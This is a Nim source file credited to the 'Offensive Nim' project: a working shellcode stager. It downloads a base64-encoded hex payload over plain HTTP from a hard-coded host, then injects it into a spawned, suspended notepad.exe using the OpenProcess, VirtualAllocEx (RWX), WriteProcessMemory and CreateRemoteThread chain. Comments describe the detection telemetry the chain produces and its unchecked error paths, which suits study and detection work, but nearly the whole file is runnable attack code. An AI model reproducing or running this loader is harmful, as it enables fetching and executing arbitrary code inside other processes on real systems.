# With special thanks to byt3bl33d3r for Offensive Nim! | |
import winim/lean | |
import osproc | |
import base64 | |
import sequtils | |
import strutils | |
import strformat | |
import httpclient | |
# Staging configuration. All five values are hard-coded; nothing below reads
# them from the command line or the environment.
let scPort = 8000                  # TCP port of the HTTP server the payload is fetched from
let scAddr = "0.0.0.0"             # host part of the payload URL (0.0.0.0 is not a
                                   # routable destination, so this reads as a placeholder)
let scFile = "note.txt"            # path component of the payload URL
let injectProcess = "notepad.exe"  # executable spawned (and suspended) as the injection target
let b64Iterations = 1              # number of base64 layers iterateDecode peels off the body
proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void =
  ## Classic CreateRemoteThread injection: spawns `injectProcess`, suspends
  ## it, allocates an RWX region inside it, copies `shellcode` there and
  ## starts a remote thread at that address.
  ##
  ## The OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx(RWX) ->
  ## WriteProcessMemory -> CreateRemoteThread chain against a freshly spawned,
  ## suspended process is the canonical pattern that EDR and Sysmon telemetry
  ## (ProcessAccess / CreateRemoteThread events) key on.
  ##
  ## Note that no Win32 return value is checked here: a NULL `pHandle`,
  ## `rPtr` or `tHandle`, or a failed write, is not detected and the next call
  ## simply proceeds with the invalid value. `bytesWritten` and `wSuccess`
  ## are assigned but never read.
  ##
  ## `shellcode.len` is the element count; it equals the byte count only for
  ## T = byte, which is what the caller at the bottom of this file passes.
  let tProcess = startProcess(injectProcess)
  # Suspended here and never resumed in this proc; only the remote thread
  # created below runs.
  tProcess.suspend()
  # defers run in reverse order at scope exit: thread handle, process handle,
  # then the osproc Process object.
  defer: tProcess.close()
  let pHandle = OpenProcess(
    PROCESS_ALL_ACCESS,
    false,
    cast[DWORD](tProcess.processID)
  )
  defer: CloseHandle(pHandle)
  # RWX commit of exactly shellcode.len bytes; the region is never made
  # read-only/execute-only afterwards, so it stays RWX for its whole lifetime.
  let rPtr = VirtualAllocEx(
    pHandle,
    NULL,
    cast[SIZE_T](shellcode.len),
    MEM_COMMIT,
    PAGE_EXECUTE_READ_WRITE
  )
  var bytesWritten: SIZE_T
  # Result (BOOL) and bytesWritten are ignored; a short or failed write is
  # silent.
  let wSuccess = WriteProcessMemory(
    pHandle,
    rPtr,
    unsafeAddr shellcode,
    cast[SIZE_T](shellcode.len),
    addr bytesWritten
  )
  # Thread entry point is the start of the copied buffer; no argument is
  # passed (lpParameter = NULL). The handle is closed on exit but the thread
  # is never waited on, so this proc returns while the payload is still
  # running.
  let tHandle = CreateRemoteThread(
    pHandle,
    NULL,
    0,
    cast[LPTHREAD_START_ROUTINE](rPtr),
    NULL,
    0,
    NULL
  )
  defer: CloseHandle(tHandle)
proc iterateDecode(sc: string, iterations: int): string =
  ## Strips `iterations` layers of base64 from `sc` and returns the plaintext.
  ## With `iterations <= 0` the input is returned unchanged. The decoded text
  ## is also echoed to stdout, so the payload is visible in the console and
  ## in any captured process output.
  var decoded = sc
  for _ in 1..iterations:
    decoded = base64.decode(decoded)
  echo decoded
  decoded
# Module-level loader. Everything up to the `when isMainModule:` guard runs
# at import time as well, so merely importing this file performs the download
# and the decode; only the injection call itself is guarded.
var client = newHttpClient()
# Plain-HTTP GET of the payload, no TLS and no integrity check: the response
# body is used as-is. This outbound request followed by a process spawn and a
# remote thread is the observable chain on the network/host side.
var sc: string = client.get(fmt"http://{scAddr}:{scPort}/{scFile}").body
# Expected body: b64Iterations layers of base64 around a comma-separated list
# of hex literals (parseHexInt accepts an optional 0x prefix). Any non-hex
# element makes parseHexInt raise ValueError.
var sc_seq = iterateDecode(sc, b64Iterations)
  .split(",")
  .map(proc (h: string): string = strip(h))
  .map(parseHexInt)
# The array size and the loop bound below are hard-coded and must agree with
# each other and with the payload length: change both together when the
# shellcode size changes.
var shellcode: array[890, byte]
# Shellcode size - 1. Fewer than 890 parsed values raises IndexDefect under
# bound checks; extra values are silently dropped; a value above 0xFF fails
# the `byte` conversion with RangeDefect under range checks — TODO confirm.
for s in 0..889:
  shellcode[s] = byte sc_seq[s]
when isMainModule:
  injectCreateRemoteThread(shellcode)